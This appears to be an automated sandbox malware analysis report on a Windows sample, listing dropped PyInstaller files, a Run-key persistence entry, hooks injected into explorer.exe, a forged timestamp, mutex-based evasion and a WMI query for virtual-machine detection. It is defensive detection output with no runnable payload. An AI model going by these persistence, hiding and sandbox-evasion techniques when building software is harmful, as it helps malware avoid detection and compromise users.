Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2062783484.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2063492265.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-timezone-l1-1-0.dll.17.dr
Source: Binary string: C:\A\6\b\libcrypto-1_1.pdb source: libcrypto-1_1.dll.17.dr
Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2062952516.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2061257377.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-file-l2-1-0.dll.17.dr
Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2064769321.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-process-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2061739114.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-libraryloader-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2061629125.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: libcrypto-1_1.dll.17.dr
Source: Binary string: C:\A\21\b\bin\amd64\unicodedata.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2069970928.000001BBE5199000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2064404985.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2065202903.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-string-l1-1-0.dll.17.dr
Binary contains a suspicious time stamp
Source: 4A64.tmp.x.exe.4.dr Static PE information: 0xD22848DC [Tue Sep 23 12:17:32 2081 UTC]
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF63A831050 LoadLibraryA,GetProcAddress, 0_2_00007FF63A831050
PE file contains sections with non-standard names
Source: libcrypto-1_1.dll.17.dr Static PE information: section name: .00cfg
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\explorer.exe Code function: 4_2_0A05EB88 push rsp; retn 0000h 4_2_0A05EB89
Source: C:\Windows\explorer.exe Code function: 4_2_0A04D892 push rax; ret 4_2_0A04D899
Source: C:\Windows\explorer.exe Code function: 4_2_0A04D912 push rsp; retn 0003h 4_2_0A04D929
Source: C:\Windows\explorer.exe Code function: 4_2_0C37D892 push rax; ret 4_2_0C37D899
Source: C:\Windows\explorer.exe Code function: 4_2_0C37D912 push rsp; retn 0003h 4_2_0C37D929
Source: C:\Windows\explorer.exe Code function: 4_2_0C38EB88 push rsp; retn 0000h 4_2_0C38EB89
Source: C:\Windows\explorer.exe Code function: 4_2_0E8DEB88 push rsp; retn 0000h 4_2_0E8DEB89
Source: C:\Windows\explorer.exe Code function: 4_2_0E8CD892 push rax; ret 4_2_0E8CD899
Source: C:\Windows\explorer.exe Code function: 4_2_0E8CD912 push rsp; retn 0003h 4_2_0E8CD929
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Code function: 9_2_01378E49 push F8B870DBh; retf 9_2_01378E4E
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FFDFFC4FAED push rdi; ret 18_2_00007FFDFFC4FAF4
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FFDFFC4A5B5 push rdi; ret 18_2_00007FFDFFC4A5BB
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FFDFFC50200 push rdi; ret 18_2_00007FFDFFC50206
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FFDFFC4A096 push rdi; ret 18_2_00007FFDFFC4A0A2
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FFE1333CB1B push rbp; retf 18_2_00007FFE1333CB28
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-crt-convert-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-heap-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-console-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-rtlsupport-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-crt-utility-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-memory-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI26522\ucrtbase.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-libraryloader-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-file-l2-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-debug-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI26522\_hashlib.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI26522\_ctypes.pyd Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-crt-string-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-crt-time-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-datetime-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-crt-conio-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI26522\select.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-crt-runtime-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-crt-locale-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-handle-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI26522\_socket.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-processthreads-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-processenvironment-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-synch-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-interlocked-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-file-l1-2-0.dll Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-localization-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-errorhandling-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-processthreads-l1-1-1.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI26522\VCRUNTIME140.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-crt-process-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-string-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-timezone-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-crt-math-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-synch-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-profile-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-file-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI26522\libcrypto-1_1.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-namedpipe-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI26522\_lzma.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-crt-heap-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-sysinfo-l1-1-0.dll Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-crt-stdio-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI26522\python38.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-crt-filesystem-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI26522\_bz2.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-util-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI26522\unicodedata.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-crt-environment-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI26522\libffi-7.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Services Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Services Jump to behavior

Hooking and other Techniques for Hiding and Protection
barindex
Changes the view of files in windows explorer (hidden files and folders)
Source: C:\Windows\System32\audiodg.exe Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced Hidden Jump to behavior
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: KERNEL32.DLL function: CreateProcessInternalW new code: 0xE9 0x90 0x00 0x07 0x75 0x5B
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Windows\explorer.exe Code function: 4_2_0E8F4710 LoadLibraryA,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 4_2_0E8F4710
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Found evasive API chain (may stop execution after checking mutex)
Source: C:\Users\user\Desktop\file.exe Evasive API call chain: CreateMutex,DecisionNodes,Sleep
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess
Source: C:\Windows\System32\msiexec.exe Evasive API call chain: CreateMutex,DecisionNodes,Sleep
Source: C:\Windows\System32\msiexec.exe Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess
Source: C:\Windows\System32\svchost.exe Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Evasive API call chain: CreateMutex,DecisionNodes,Sleep
Source: C:\Windows\System32\svchost.exe Evasive API call chain: CreateMutex,DecisionNodes,Sleep
Source: C:\Windows\System32\audiodg.exe Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess
Source: C:\Users\user\Desktop\file.exe Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess
Source: C:\Windows\explorer.exe Evasive API call chain: CreateMutex,DecisionNodes,Sleep
Source: C:\Windows\System32\audiodg.exe Evasive API call chain: CreateMutex,DecisionNodes,Sleep
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
